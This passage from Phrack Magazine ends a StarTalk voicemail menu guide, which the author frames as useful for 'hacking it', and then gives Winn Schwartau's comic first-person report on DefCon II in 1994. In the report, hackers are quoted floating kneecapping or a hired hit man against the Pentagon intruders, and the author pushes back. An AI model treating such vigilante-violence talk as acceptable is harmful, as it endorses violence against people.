To change the destination type to pager, press 1
|
|||
|
Note: The destination type can be either telephone or pager. StarTalk
|
|||
|
automatically selects telephone. When the pager destination
|
|||
|
type is selected, a pause must be inserted. The number of pauses
|
|||
|
required depends on the pager system being used.
|
|||
|
11. To accept the destination type, press #
|
|||
|
If the message destination type is a telephone, you must set a start time.
|
|||
|
12. Enter the time when Off-premise Message Notification is to start.
|
|||
|
Note: This is a four-digit field. Any single digit hour and minute
|
|||
|
must be preceded by a zero.
|
|||
|
13. Press 1 for AM, 2 for PM.
|
|||
|
14. To accept the start time, press #
|
|||
|
15. Enter the time when Off-premise Message Notification is to stop.
|
|||
|
Note : This is a four-digit field. Any single digit hour and
|
|||
|
minute must be preceded by a zero.
|
|||
|
16. Press 1 for AM, 2 for PM.
|
|||
|
17. To accept the stop time, press #
|
|||
|
18. To accept the message type NEW, press #
|
|||
|
To change the message type to URGENT, press 1
|
|||
|
Note: The default message type is NEW. This means you are notified
|
|||
|
whenever you receive a new message. Changing the message type changes
|
|||
|
NEW to URGENT. This means you are only notified when you receive an
|
|||
|
urgent message.
|
|||
|
19. To accept the message type, press #
|
|||
|
|
|||
|
The Off-premise Message Notification will begin as soon as the start time
|
|||
|
is reached. You will be called whenever you receive a message.
|
|||
|
|
|||
|
|
|||
|
Disabling Off-premise Message Notification
|
|||
|
------------------------------------------
|
|||
|
To disable Off-premise Message Notification, you must first open your
|
|||
|
mailbox, Once your mailbox is open:
|
|||
|
|
|||
|
1. Open the mailbox admin menu, press 8
|
|||
|
2. To access the message notification menu, press 6
|
|||
|
3. To listen to the options, press 2
|
|||
|
4. To disable message notification, press 1
|
|||
|
|
|||
|
Off-premise Message Notification is disabled.
|
|||
|
|
|||
|
Changing Off-premise Message Notification
|
|||
|
-----------------------------------------
|
|||
|
To change Off-premise Message Notification, you must first open your mailbox,
|
|||
|
Once you have opened your mailbox:
|
|||
|
|
|||
|
1. Open the mailbox admin menu, press 8
|
|||
|
2. Open the message notification menu, press 6
|
|||
|
3. To change message notification press 1
|
|||
|
4. To select a line, press 1
|
|||
|
5. Press 1
|
|||
|
If you wish to change the line, press #
|
|||
|
6. Enter the new line number.
|
|||
|
7. To end the line number, press #
|
|||
|
8. To accept the line number, press #
|
|||
|
9. Press 1
|
|||
|
If you do not wish to change the destination telephone number, press #
|
|||
|
10. Enter the new destination telephone number.
|
|||
|
11. To end the telephone number, press #
|
|||
|
12. To accept the telephone number, press #
|
|||
|
13. To change the destination type, press 1
|
|||
|
14. To accept the destination type, press #
|
|||
|
15. To change the start time, press 1
|
|||
|
If you do not wish to change the time, press #
|
|||
|
16. Enter the time when Off-premise Message Notification is to start.
|
|||
|
17. Press 1 for AM, 2 for PM.
|
|||
|
18. To accept the start time, press #
|
|||
|
19. To change the stop time, press 1
|
|||
|
If you do not wish to change the time, press #
|
|||
|
20. Enter the time when Off-premise Message Notification is to stop.
|
|||
|
21. Press 1 for AM, 2 for PM.
|
|||
|
22. To accept the stop time, press #
|
|||
|
23. To change the message type, press 1
|
|||
|
24. To accept the message type, press #
|
|||
|
|
|||
|
Leaving a Mailbox Message
|
|||
|
-------------------------
|
|||
|
You can leave a message directly in any StarTalk mailbox, as long as that
|
|||
|
mailbox has been initialized.
|
|||
|
|
|||
|
To leave a mailbox message:
|
|||
|
|
|||
|
1. Enter the mailbox # and at the tone, record your message.
|
|||
|
2. To end your recording, press #
|
|||
|
3. For delivery options, press 3
|
|||
|
4. To send your message, press #
|
|||
|
|
|||
|
Message Delivery Options
|
|||
|
------------------------
|
|||
|
StarTalk provides you with four message delivery options, which are:
|
|||
|
|
|||
|
Certified 1 - This delivery option sends you a message and tells you if
|
|||
|
the person received and read your message, but this is
|
|||
|
only if the message is inside the system.
|
|||
|
|
|||
|
Urgent 2 - This delivery option marks the message, and plays it before
|
|||
|
playing other messages left in your mailbox.
|
|||
|
|
|||
|
Private 3 - This delivery option prevents a message from being forwarded
|
|||
|
to another mailbox.
|
|||
|
|
|||
|
Normal # - This delivery option sends a message to a mailbox. Normal
|
|||
|
messages are played in the order in which they are received,
|
|||
|
and can be forwarded to other mailboxes.
|
|||
|
|
|||
|
After you have recorded your mailbox message, press 3 to access delivery
|
|||
|
options. To use one of the delivery options, press the right delivery
|
|||
|
option number.
|
|||
|
|
|||
|
Note: When leaving a message, you can press 9 to listen to StarTalk voice
|
|||
|
prompts in the alternate language.
|
|||
|
|
|||
|
Assigning the Target Attendant
|
|||
|
------------------------------
|
|||
|
Anyone that presses [0] when they are connected to your box will be
|
|||
|
transferred to an operator if your Target Attendant is set to [0] or her
|
|||
|
mailbox #.
|
|||
|
|
|||
|
To change from the Operator to the Target Attendant -
|
|||
|
|
|||
|
1. Press 8
|
|||
|
2. Press 5
|
|||
|
3. Press 1
|
|||
|
4. Enter <desired extension>
|
|||
|
5. Press *
|
|||
|
|
|||
|
Quick Reference Tips
|
|||
|
--------------------
|
|||
|
|
|||
|
- To save time, you can just interrupt most prompts by press # or selecting
|
|||
|
a StarTalk option.
|
|||
|
|
|||
|
- If you get lost using StarTalk options, press * to replay the option list
|
|||
|
|
|||
|
```````````````````````````````````````````````````````````````````````````
|
|||
|
Ok, this is the end of the StarTalk voice mail guide. I tried my best
|
|||
|
to make it as simple as I could with respect to both hacking it
|
|||
|
and using it. I plan on writing my next file on Smooth Operator, a
|
|||
|
PC-based information processing system. I will probably focus more on
|
|||
|
the terminal part of it. I will try and cover the logins and all other
|
|||
|
things needed to get around the system. If any readers out there have
|
|||
|
comments or suggestions on this article, or on my next article, please
|
|||
|
contact me.
|
|||
|
|
|||
|
If you would like to talk about this, you can find me on IRC with the nick
|
|||
|
'redskull' or you can write me a message on my Internet Address.
|
|||
|
Internet Address : redskull@io.org
|
|||
|
|
|||
|
I'd like to thank S. Cleft for giving me some tips and also discovering
|
|||
|
some of the things I've mentioned in this file.
|
|||
|
|
|||
|
```````````````````````````````````````````````````````````````````````````` ==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 19 of 28
|
|||
|
|
|||
|
****************************************************************************
|
|||
|
|
|||
|
DefCon II: Las Vegas
|
|||
|
|
|||
|
Cyber-Christ meets Lady Luck
|
|||
|
|
|||
|
July 22-24, 1994
|
|||
|
|
|||
|
by Winn Schwartau
|
|||
|
(C) 1994
|
|||
|
|
|||
|
|
|||
|
Las Vegas connotes radically different images to radically dif
|
|||
|
ferent folks. The Rat Pack of Sinatra, Dean Martin and Sammy
|
|||
|
Davis Jr. elicits up the glistening self-indulgent imagery of
|
|||
|
Vegas' neon organized crime in the '50's (Ocean's Eleven
|
|||
|
displayed only minor hacking skills.)
|
|||
|
|
|||
|
Then there's the daily bus loads of elderly nickel slot gam
|
|||
|
blers from Los Angeles and Palm Springs who have nothing better
|
|||
|
to do for twenty out of twenty four hours each day. (Their
|
|||
|
dead husbands were golf hacks.) Midwesterners now throng to
|
|||
|
the Mississippi River for cheap gambling.
|
|||
|
|
|||
|
Recreational vehicles of semi-trailor length from East Bullock,
|
|||
|
Montana and Euclid, Oklahoma and Benign, Ohio clog routes 80
|
|||
|
and 40 and 10 to descend with a vengeance upon an asphalt home
|
|||
|
away from home in the parking lot of Circus Circus. By cul
|
|||
|
tural demand, every Rv'er worth his salt must, at least once in
|
|||
|
his life, indulge in the depravity of Glitter Gulch.
|
|||
|
|
|||
|
And so they come, compelled by the invisibly insidious derelict
|
|||
|
attraction of a desert Mecca whose only purpose in life is to
|
|||
|
suck the available cash from addicted visitor's electronic
|
|||
|
purses of ATM and VISA cards. (Hacker? Nah . . .)
|
|||
|
|
|||
|
Vegas also has the distinction of being home to the largest of
|
|||
|
the largest conventions and exhibitions in the world. Comdex
|
|||
|
is the world's largest computer convention where 150,000 techno-
|
|||
|
dweebs and silk suited glib techno-marketers display their
|
|||
|
wares to a public who is still paying off the 20% per annum
|
|||
|
debt on last year's greatest new electronic gismo which is
|
|||
|
now rendered thoroughly obsolete. And the Vegas Consumer Elec
|
|||
|
tronic Show does for consumer electronics what the First Amend
|
|||
|
ment does for pornography. (Hackers, are we getting close?)
|
|||
|
|
|||
|
In between, hundreds upon hundreds of small conferences and
|
|||
|
conventions and sales meetings and annual excuses for excess
|
|||
|
all select Las Vegas as the ultimate host city. Whatever you
|
|||
|
want, no matter how decadent, blasphemous, illegal or immoral, at
|
|||
|
any hour, is yours for the asking, if you have cash or a clean
|
|||
|
piece of plastic.
|
|||
|
|
|||
|
So, it comes as no surprise, that sooner or later, (and it turns
|
|||
|
out to be sooner) that the hackers of the world, the computer
|
|||
|
hackers, phone phreaks, cyber-spooks, Information Warriors, data
|
|||
|
bankers, Cyber-punks, Cypher-punks, eavesdroppers, chippers,
|
|||
|
virus writers and perhaps the occasional Cyber Christ again
|
|||
|
picked Las Vegas as the 1994 site for DefCon II.
|
|||
|
|
|||
|
You see, hackers are like everyone else (sort of) and so they,
|
|||
|
too, decided that their community was also entitled to hold
|
|||
|
conferences and conventions.
|
|||
|
|
|||
|
DefCon (as opposed to Xmas's HoHoCon), is the premier mid-year
|
|||
|
hacker extravaganza. Indulgence gone wild, Vegas notwithstanding
|
|||
|
if previous Cons are any example; but now put a few hundred
|
|||
|
techno-anarchists together in sin city USA, stir in liberal
|
|||
|
doses of illicit controlled pharmaceutical substances, and we
|
|||
|
have a party that Hunter Thompson would be proud to attend.
|
|||
|
|
|||
|
All the while, as this anarchistic renegade regiment marches to
|
|||
|
the tune of a 24 hour city, they are under complete surveillance
|
|||
|
of the authorities. Authorities like the FBI, the Secret Serv
|
|||
|
ice, telephone security . . . maybe even Interpol. And how did
|
|||
|
the "man" arrive in tow behind the techno-slovens that belong
|
|||
|
behind bars?
|
|||
|
|
|||
|
They were invited.
|
|||
|
|
|||
|
And so was I. Invited to speak. (Loose translation for standing
|
|||
|
up in front of hundreds of hackers and being verbally skewered
|
|||
|
for having an opinion not in 100% accordance with their own.)
|
|||
|
|
|||
|
"C'mon, it'll be fun," I was assured by DefCon's organizer, the
|
|||
|
Dark Tangent.
|
|||
|
|
|||
|
"Sure fired way to become mutilated monkey meat," I responded.
|
|||
|
Some hackers just can't take a joke, especially after a prison
|
|||
|
sentence and no opposite-sex sex.
|
|||
|
|
|||
|
"No really, they want to talk to you . . ."
|
|||
|
|
|||
|
"I bet."
|
|||
|
|
|||
|
It's not that I dislike hackers - on the contrary. I have even
|
|||
|
let a few into my home to play with my kids. It's just that, so
|
|||
|
many of the antics that hackers have precipitated at other Cons
|
|||
|
have earned them a reputation of disdain by all, save those who
|
|||
|
remember their own non-technical adolescent shenanigans. And I
|
|||
|
guess I'm no different. I've heard the tales of depraved indif
|
|||
|
ference, hotel hold-ups, government raids on folks with names
|
|||
|
similar to those who are wanted for pushing the wrong key on the
|
|||
|
keyboard and getting caught for it. I wanted to see teens and X-
|
|||
|
generation types with their eyes so star sapphire glazed over that
|
|||
|
I could trade them for chips at the craps table.
|
|||
|
|
|||
|
Does the truth live up to the fiction? God, I hope so. It'd be
|
|||
|
downright awful and unAmerican if 500 crazed hackers didn't get
|
|||
|
into at least some serious trouble.
|
|||
|
|
|||
|
So I go to Vegas because, because, well, it's gonna be fun. And,
|
|||
|
if I'm lucky, I might even see an alien spaceship.
|
|||
|
|
|||
|
For you see, the party has already begun.
|
|||
|
|
|||
|
|
|||
|
I go to about 30 conventions and conferences a year, but rarely
|
|||
|
if ever am I so Tylonol and Aphrin dosed that I decide to go with
|
|||
|
a severe head cold. Sympomatic relief notwithstanding I debated
|
|||
|
and debated, and since my entire family was down with the same
|
|||
|
ailment I figured Vegas was as good a place to be as at home in
|
|||
|
bed. If I could survive the four and half hour plane flight
|
|||
|
without my Eustahian tubes rocketing through my ear drums and
|
|||
|
causing irreparable damage, I had it made.
|
|||
|
|
|||
|
The flight was made tolerable becuase I scuba dive. Every few
|
|||
|
minutes I drowned out the drone of the engines by honking uncon
|
|||
|
trollably like Felix Ungerto without his aspirator. To the
|
|||
|
chagrin of my outspoken counter surveillance expert and traveling
|
|||
|
mate, Mike Peros and the rest of the first class cabin, the
|
|||
|
captain reluctantly allowed be to remain on the flight and not be
|
|||
|
expelled sans parachute somewhere over Southfork, Texas. Snort,
|
|||
|
snort. Due to extensive flirting with the two ladies across the
|
|||
|
aisle, we made the two thousand mile trek in something less than
|
|||
|
34 minutes . . . or so it seemed. Time flies took on new mean
|
|||
|
ing.
|
|||
|
|
|||
|
For those who don't know, the Sahara Hotel is the dregs of the
|
|||
|
Strip. We were not destined for Caesar's or the MGM or any of
|
|||
|
the new multi-gazillion dollar hotel cum casinos which produce
|
|||
|
pedestrian stopping extravaganzas as an inducement to suck in
|
|||
|
little old ladies to pour endless rolls of Washington quarters in
|
|||
|
mechanical bottomless pits. The Sahara was built some 200 years
|
|||
|
ago by native slave labor whose idea of plumbing is clean sand
|
|||
|
and decorators more concerned with a mention in Mud Hut Daily
|
|||
|
than Architectural Digest. It was just as depressingly dingy and
|
|||
|
solicitly low class as it was when I forced to spend eleven days
|
|||
|
there (also with a killer case of the flu) for an extended Comdex
|
|||
|
computer show. But, hey, for a hacker show, it was top flight.
|
|||
|
|
|||
|
"What hackers?" The desk clerk said when I asked about the show.
|
|||
|
|
|||
|
I explained. Computer hackers: the best from all over the coun
|
|||
|
try. "I hear even Cyber Christ himself might appear."
|
|||
|
|
|||
|
Her quizzical look emphasized her pause. Better to ignore a
|
|||
|
question not understood than to look stupid. "Oh, they'll be
|
|||
|
fine, We have excellent security." The security people, I found
|
|||
|
out shortly thereafter knew even less: "What's a hacker?" Too
|
|||
|
much desert sun takes its toll. Proof positive photons are bad
|
|||
|
for neurons.
|
|||
|
|
|||
|
Since it was still only 9PM Mike and I sucked down a couple of $1
|
|||
|
Heinekens in the casino and fought it out with Lineman's Switch
|
|||
|
ing Union representatives who were also having their convention
|
|||
|
at the Sahara. Good taste in hotels goes a long way.
|
|||
|
|
|||
|
"$70,000 a year to turn a light from red to green?" we com
|
|||
|
plained.
|
|||
|
|
|||
|
"It's a tension filled job . . .and the overtime is murder."
|
|||
|
|
|||
|
"Why a union?"
|
|||
|
|
|||
|
"To protect our rights."
|
|||
|
|
|||
|
"What rights?"
|
|||
|
|
|||
|
"To make sure we don't get replaced by a computer . . ."
|
|||
|
|
|||
|
"Yeah," I agreed. "That would be sad. No more Amtrak
|
|||
|
disasters." The crowd got ugly so we made a hasty retreat under
|
|||
|
the scrutiny of casino security to our rooms. Saved.
|
|||
|
|
|||
|
Perhaps if I noticed or had read the original propaganda on
|
|||
|
DefCon, I might have known that nothing significant was going to
|
|||
|
take place until the following (Friday) evening I might have
|
|||
|
missed all the fun.
|
|||
|
|
|||
|
For at around 8AM, my congestion filled cavities and throbbing
|
|||
|
head was awakened by the sound of an exploding toilet. It's kind
|
|||
|
of hard to explain what this sounds like. Imagine a toilet
|
|||
|
flushing through a three megawatt sound system at a Rolling
|
|||
|
Stones concert. Add to that the sound of a hundred thousand flu
|
|||
|
victims standing in an echo chamber cleansng their sinuses into a
|
|||
|
mountain of Kleenex while three dozen football referees blow
|
|||
|
their foul whistles in unison, and you still won't come close to
|
|||
|
the sheer cacophonous volume that my Saharan toilet exuded from
|
|||
|
within its bowels. And all for my benefit.
|
|||
|
|
|||
|
The hotel manager thought I was kidding. "What do you mean
|
|||
|
exploded?"
|
|||
|
|
|||
|
"Which word do you not understand?" I growled in my early morning
|
|||
|
sub-sonic voice. "If you don't care, I don't."
|
|||
|
|
|||
|
My bed was floating. Three or maybe 12 inches of water created
|
|||
|
the damnedest little tidal wave I'd ever seen, and the sight and
|
|||
|
sound of Lake Meade in room 1487 only exascerbatd the pressing
|
|||
|
need to relieve myself. I dried my feet on the extra bed linens,
|
|||
|
worried about electrocution and fell back asleep. It could have
|
|||
|
been 3 minutes or three hours later - I have no way to know -
|
|||
|
but my hypnogoic state was rudely interrupted by hotel mainte
|
|||
|
nance pounding at the door with three fully operational muffler-
|
|||
|
less jack hammers.
|
|||
|
|
|||
|
"I can't open it," I bellowed over the continual roar of my
|
|||
|
personal Vesuvius Waterfall. "Just c'mon in." The fourteenth
|
|||
|
floor hallway had to resemble an underwater coral display becuase
|
|||
|
the door opened ever so slowly..
|
|||
|
|
|||
|
"Holy Christ!"
|
|||
|
|
|||
|
Choking back what would have been a painful laugh, I somehow
|
|||
|
eeked out the words, with a smirk, "Now you know what an explo-
|
|||
|
ding toilet is like."
|
|||
|
|
|||
|
For, I swear, the next two hours three men whose English was
|
|||
|
worse than a dead Armadillo attempted to suck up the Nile River
|
|||
|
from my room and the hallway. Until that very moment in time, I
|
|||
|
didn't know that hotels were outfitted with vacuum cleaners
|
|||
|
specifically designed to vacuum water. Perhaps this is a regular
|
|||
|
event.
|
|||
|
|
|||
|
|
|||
|
Everyone who has ever suffered through one bitches about Vegas
|
|||
|
buffets, and even the hackers steered away from the Sahara's
|
|||
|
$1.95 "all you can eat" room: "The Sahara's buffet is the worst
|
|||
|
in town; worse than Circus Circus." But since I had left my
|
|||
|
taste buds at 37,000 feet along with schrapneled pieces of my
|
|||
|
inner ear, I sought out sustenance only to keep me alive another
|
|||
|
24 hours.
|
|||
|
|
|||
|
By mid afternoon, I had convinced myself that outside was not the
|
|||
|
place to be. After only eighteen minutes of 120 sidewalk egg-
|
|||
|
cooking degrees, the hot desert winds took what was left of my
|
|||
|
breath away and with no functioning airways as it was, I knew
|
|||
|
this was a big mistake. So, hacker convention, ready or not,
|
|||
|
here I come.
|
|||
|
|
|||
|
Now, you have to keep in mind that Las Vegas floor plans are
|
|||
|
designed with a singular purpose in mind. No matter where you
|
|||
|
need to go, from Point A to Point B or Point C or D or anywhere,
|
|||
|
the traffic control regulations mandated by the local police and
|
|||
|
banks require that you walk by a minimum of 4,350 slot machines,
|
|||
|
187 gaming tables of various persuasions and no less than 17
|
|||
|
bars. Have they no remorse? Madison Avenue ad execs take heed!
|
|||
|
|
|||
|
So, lest I spend the next 40 years of my life in circular pursuit
|
|||
|
of a sign-less hacker convention losing every last farthing I
|
|||
|
inherited from dead Englishmen, I asked for the well hidden loca-
|
|||
|
tion at the hotel lobby.
|
|||
|
|
|||
|
"What hackers?" There goes that nasty photon triggered neuron
|
|||
|
depletion again.
|
|||
|
|
|||
|
"The computer hackers."
|
|||
|
|
|||
|
"What computer hackers. We don't have no stinking hackers . . ."
|
|||
|
Desk clerk humor, my oxymoron for the week.
|
|||
|
|
|||
|
I tried the name: DefCon II.
|
|||
|
|
|||
|
"Are we going to war?" one ex-military Uzi-wielding guard said
|
|||
|
recognizing the etymology of the term.
|
|||
|
|
|||
|
"Yesh, it's true" I used my most convincing tone. "The Khasaks
|
|||
|
tanis are coming with nuclear tipped lances riding hundred foot
|
|||
|
tall horses. Paris has already fallen. Berlin is in ruins.
|
|||
|
Aren't you on the list to defend this great land?"
|
|||
|
|
|||
|
"Sure as shit am!" He scampered off to the nearest phone in an
|
|||
|
effort to be the first on the front lines. Neuron deficiency
|
|||
|
beyong surgical repair..
|
|||
|
|
|||
|
I slithered down umpteen hallways and casino aisles lost in the
|
|||
|
jungle of jingling change. Where the hell are the hackers?
|
|||
|
"They must be there," another neuron-impoverished Saharan employ
|
|||
|
ee said as he pointed towards a set of escalators at the very far
|
|||
|
end of the casino.
|
|||
|
|
|||
|
All the way at the end of the almost 1/4 mile trek through Sodom
|
|||
|
and Gonorrhea an 'up' escalator promised to take me to hackerdom.
|
|||
|
Saved at last. Upstairs. A conference looking area. No signs
|
|||
|
anywhere, save one of those little black Velcro-like stick-em
|
|||
|
signs where you can press on white block letters.
|
|||
|
|
|||
|
No Mo Feds
|
|||
|
|
|||
|
I must be getting close. Aha, a maintenance person; I'll ask him.
|
|||
|
"What hackers? What's DefCon."
|
|||
|
|
|||
|
Back downstairs, through the casino, to the front desk, back
|
|||
|
through the casino, up the same escalator again. Room One I was
|
|||
|
told. Room One was empty. Figures. But, at the end of a
|
|||
|
hallway, past the men's room and the phones, and around behind
|
|||
|
Room One I saw what I was looking for: a couple of dozen T-shirt
|
|||
|
ed, Seattle grunged out kids (read: under 30) sitting at uncov
|
|||
|
ered six foot folding tables hawking their DefCon II clothing,
|
|||
|
sucking on Heinekens and amusing themselves with widely strewn
|
|||
|
backpacks and computers and cell phones.
|
|||
|
|
|||
|
I had arrived!
|
|||
|
|
|||
|
* * * *
|
|||
|
|
|||
|
You know, regular old suit and tie conferences could learn a
|
|||
|
thing or two from Jeff Moss, the man behind DefCon II. No fancy
|
|||
|
badge making equipment; no $75 per hour union labor built regis
|
|||
|
tration desks; no big signs proclaiming the wealth of knowledge
|
|||
|
to be gained by signing up early. Just a couple of kids with a
|
|||
|
sheet of paper and a laptop.
|
|||
|
|
|||
|
It turned out I was expected. They handed me my badge and what a
|
|||
|
badge it was. I'm color blind, but this badge put any psychedel
|
|||
|
ically induced spectral display to shame. In fact it was a close
|
|||
|
match to the Sahara's mid 60's tasteless casino carpeting which
|
|||
|
is so chosen as to hide the most disgusting regurgative blessing.
|
|||
|
But better and classier.
|
|||
|
|
|||
|
The neat thing was, you could (in fact had to) fill out your own
|
|||
|
badge once your name was crossed off the piece of paper that
|
|||
|
represented the attendee list.
|
|||
|
|
|||
|
Name:
|
|||
|
Subject of Interest:
|
|||
|
E-Mail:
|
|||
|
|
|||
|
Fill it out any way you want. Real name, fake name, alias,
|
|||
|
handle - it really doesn't matter cause the hacker underground
|
|||
|
ethic encourages anonymity. "We'd rather not know who you are
|
|||
|
anyway, unless you're a Fed. Are you a Fed?"
|
|||
|
|
|||
|
A couple of lucky hackers wore the ultimate badge of honor. An
|
|||
|
"I Spotted A Fed" T-shirt. This elite group sat or lay on the
|
|||
|
ground watching and scouring the registration area for signs that
|
|||
|
someone, anyone, was a Fed. They really didn't care or not if
|
|||
|
you were a Fed - they wanted the free T-shirt and the peer re
|
|||
|
spect that it brought.
|
|||
|
|
|||
|
I'm over 30 (OK, over 35) and more than a few times (OK, a little
|
|||
|
over 40) I had to vehemently deny being a Fed. Finally Jeff Moss
|
|||
|
came to the rescue.
|
|||
|
|
|||
|
"He's not a Fed. He's a security guy and a writer."
|
|||
|
|
|||
|
"Ugh! That's worse. Can I get a T-shirt cause he's a writer?"
|
|||
|
No way hacker-breath.
|
|||
|
|
|||
|
Jeff. Jeff Moss. Not what I expected. I went to school with a
|
|||
|
thousand Jeff Mosses. While I had hair down to my waist, wearing
|
|||
|
paisley leather fringe jackets and striped bell bottoms so wide I
|
|||
|
appeared to be standing on two inverted ice cream cones, the Jeff
|
|||
|
Mosses of the world kept their parents proud. Short, short
|
|||
|
cropped hair, acceented by an ashen pall and clothes I stlll
|
|||
|
wouldn't wear today. They could get away with anything cause
|
|||
|
they didn't look the part of radical chic. Jeff, I really like
|
|||
|
Jeff: he doesn't look like what he represents. Bruce Edelstein,
|
|||
|
(now of HP fame) used to work for me. He was hipper than hip but
|
|||
|
looked squarer than square. Now today that doesn't mean as much
|
|||
|
as it used to, but we ex-30-somethings have a hard time forget
|
|||
|
ting what rebellion was about. (I was suspended 17 times in the
|
|||
|
first semester of 10th grade for wearing jeans.)
|
|||
|
|
|||
|
Jeff would fit into a Corporate Board Meeting if he wore the
|
|||
|
right suit and uttered the right eloquencies: Yes, that's it: A
|
|||
|
young Tom Hanks. Right. I used to hate Tom Hanks (Splash, how
|
|||
|
fucking stupid except for the TV-picture tube splitting squeals)
|
|||
|
but I've come to respect the hell out of him as an actor. Jeff
|
|||
|
never had to pass through that first phase. I instantly liked
|
|||
|
him and certainly respect his ability to pull off a full fledged
|
|||
|
conference for only $5000.
|
|||
|
|
|||
|
You read right. Five grand and off to Vegas with 300 of your
|
|||
|
closest personal friends, Feds in tow, for a weekend of electron
|
|||
|
ic debauchery. "A few hundred for the brochure, a few hundred
|
|||
|
hear, a ton in phone bills, yeah, about $5000 if no one does any
|
|||
|
damage." Big time security shows cost $200,000 and up. I can
|
|||
|
honestly say without meaning anything pejorative at any of my
|
|||
|
friends and busienss acquaintances, that I do not learn 40 times
|
|||
|
as much at the 'real' shows. Something is definitely out of
|
|||
|
whack here. Suits want to see suits. Suits want to see fancy.
|
|||
|
Suits want to see form, substance be damned. Suits should take a
|
|||
|
lesson from my friend Jeff.
|
|||
|
|
|||
|
* * * * *
|
|||
|
|
|||
|
I again suffered through a tasteless Saharan buffer dinner which
|
|||
|
cost me a whopping $7.95. I hate grits - buttered sand is what I
|
|||
|
call them - but in this case might well have been preferable.
|
|||
|
Somehow I coerced a few hackers to join me in the ritualistic
|
|||
|
slaughter of our taste buds and torture of our intestines. They
|
|||
|
were not pleased with my choice of dining, but then who gives a
|
|||
|
shit? I couldn't taste anything anyway. Tough.
|
|||
|
|
|||
|
To keep our minds off of the food we talked about something much
|
|||
|
more pleasant: the recent round of attacks on Pentagon computers
|
|||
|
and networks. "Are the same people involved as in the sniffing
|
|||
|
attacks earlier this year?" I asked my triad of dinner mates.
|
|||
|
|
|||
|
"Indubitably."
|
|||
|
|
|||
|
"And what's the reaction from the underground - other hackers?"
|
|||
|
|
|||
|
Coughs, sniffs. Derisive visual feedback. Sneers. The finger.
|
|||
|
|
|||
|
"We can't stand 'em. They're making it bad for everybody." Two
|
|||
|
fingers.
|
|||
|
|
|||
|
By and large the DefCon II hackers are what I call 'good hackers'
|
|||
|
who hack, and maybe crack some systems upon occasion, but aren't
|
|||
|
what I refer to as Information Warriors in the bad sense of the
|
|||
|
word. This group claimed to extol the same position as most of
|
|||
|
the underground would: the Pentagon sniffing crackers - or
|
|||
|
whoever who is assaulting thousands of computers on the net -
|
|||
|
must be stopped.
|
|||
|
|
|||
|
"Scum bags, that what they are." I asked that they not sugarcoat
|
|||
|
their feelings on my behalf. I can take it. "These fuckers are
|
|||
|
beyond belief; they're mean and don't give a shit how much damage
|
|||
|
they do." We played with our food only to indulge in the single
|
|||
|
most palatable edible on display: ice cream with gobs of choco
|
|||
|
late syrup with a side of coffee. .
|
|||
|
|
|||
|
The big question was, what to do? The authorities are certainly
|
|||
|
looking for a legal response; perhaps another Mitnick or Phiber
|
|||
|
Optik. Much of the underground cheered when Mark Abene and
|
|||
|
others from the reknowned Masters of Destruction went to spend a
|
|||
|
vacation at the expense of the Feds. The MoD was up to no good
|
|||
|
and despite Abene's cries that there was no such thing as the
|
|||
|
MoD, he lost and was put away. However many hackers believe as I
|
|||
|
do, that sending Phiber to jail for hacking was the wrong punish
|
|||
|
ment. Jail time won't solve anything nor cure a hacker from his
|
|||
|
first love. One might as well try to cure a hungry man from
|
|||
|
eating: No, Mark did wrong, but sending him to jail was wrong,
|
|||
|
too. The Feds and local computer cops and the courts have to
|
|||
|
come up with punishments appropriate to the crime. Cyber-crimes
|
|||
|
(or cyber-errors) should not be rewarded by a trip to an all male
|
|||
|
hotel where the favorite toy is a phallically carved bar of soap.
|
|||
|
|
|||
|
On the other hand, hackers in general are so incensed over the
|
|||
|
recent swell of headline grabbing break-ins, and law enforcement
|
|||
|
has thus far appeared to be impotent, ("These guys are good.")
|
|||
|
that many are searching for alternative means of retribution.
|
|||
|
|
|||
|
"An IRA style knee capping is in order," said one.
|
|||
|
|
|||
|
"That's not good enough, not enough pain," chimed in another.
|
|||
|
(Sip, sip. I can almost taste the coffee.)
|
|||
|
|
|||
|
"Are you guys serious?" I asked. Violence? You? I thought I
|
|||
|
knew them better than that. I know a lot of hackers, none that I
|
|||
|
know of is violent, and this extreme Pensacola retribution
|
|||
|
attitude seemed tottally out of character. "You really wouldn't
|
|||
|
do that, would you?" My dinner companions were so upset and they
|
|||
|
claimed to echo the sentiment of all good-hackers in good stand
|
|||
|
ing, that yes, this was a viable consideration.
|
|||
|
|
|||
|
"The Feds aren't doing it, so what choice do we have? I've heard
|
|||
|
talk about taking up a collection to pay for a hit man . . ."
|
|||
|
Laughter around, but nervous laughter.
|
|||
|
|
|||
|
"You wouldn't. . ." I insisted.
|
|||
|
|
|||
|
"Well, probably not us, but that doesn't mean someone else
|
|||
|
doesn't won't do it."
|
|||
|
|
|||
|
"So you know who's behind this whole thing."
|
|||
|
|
|||
|
"Fucking-A we do," said yet another hacker chomping at the bit.
|
|||
|
He was obviously envisioning himself with a baseball bat in his
|
|||
|
hand.
|
|||
|
|
|||
|
"So do the Feds."
|
|||
|
|
|||
|
So now I find myself in the dilemma of publishing the open secret
|
|||
|
of who's behind the Internet sniffing and Pentagon break ins, but
|
|||
|
after talking to people from both the underground and law en
|
|||
|
forcement, I think I'll hold off awhile It serves no immediate
|
|||
|
purpose other than to warn off the offenders, and none of us want
|
|||
|
that.
|
|||
|
|
|||
|
Obviously all is not well in hacker-dom.
|
|||
|
|
|||
|
* * * * *
|
|||
|
|
|||
|
The registration area was beyond full; computers, backpacks
|
|||
|
everywhere, hundreds of what I have to refer to as kids and a
|
|||
|
fair number of above ground security people. Padgett Peterson of
|
|||
|
Martin Marietta was going to talk about viruses, Sara Gordon on
|
|||
|
privacy, Mark Aldrich is a security guy from DC., and a bunch of
|
|||
|
other folks I see on the seemingly endless security trade show
|
|||
|
circuit. Jeff Moss had marketed himself and the show excellently.
|
|||
|
Los Angeles sent a TV crew, John Markoff from the New York Times
|
|||
|
popped in as did a writer from Business Week. (And of course,
|
|||
|
yours truly.)
|
|||
|
|
|||
|
Of the 360 registrees ("Plus whoever snuck in," added Jeff) I
|
|||
|
guess about 20% were so-called legitimate security people. That's
|
|||
|
not to belittle the mid-20's folks who came not because they were
|
|||
|
hackers, but because they like computers. Period. They hack for
|
|||
|
themselves and not on other systems, but DefCon II offered some
|
|||
|
thing for everyone.
|
|||
|
|
|||
|
I remember 25 years ago how my parents hated the way I dressed
|
|||
|
for school or concerts or just to hang out: God forbid! We wore
|
|||
|
those damned jeans and T-shirts and sneakers or boots! "Why can't
|
|||
|
you dress like a human being," my mother admonished me day after
|
|||
|
day, year after year. So I had to check myself because I can't
|
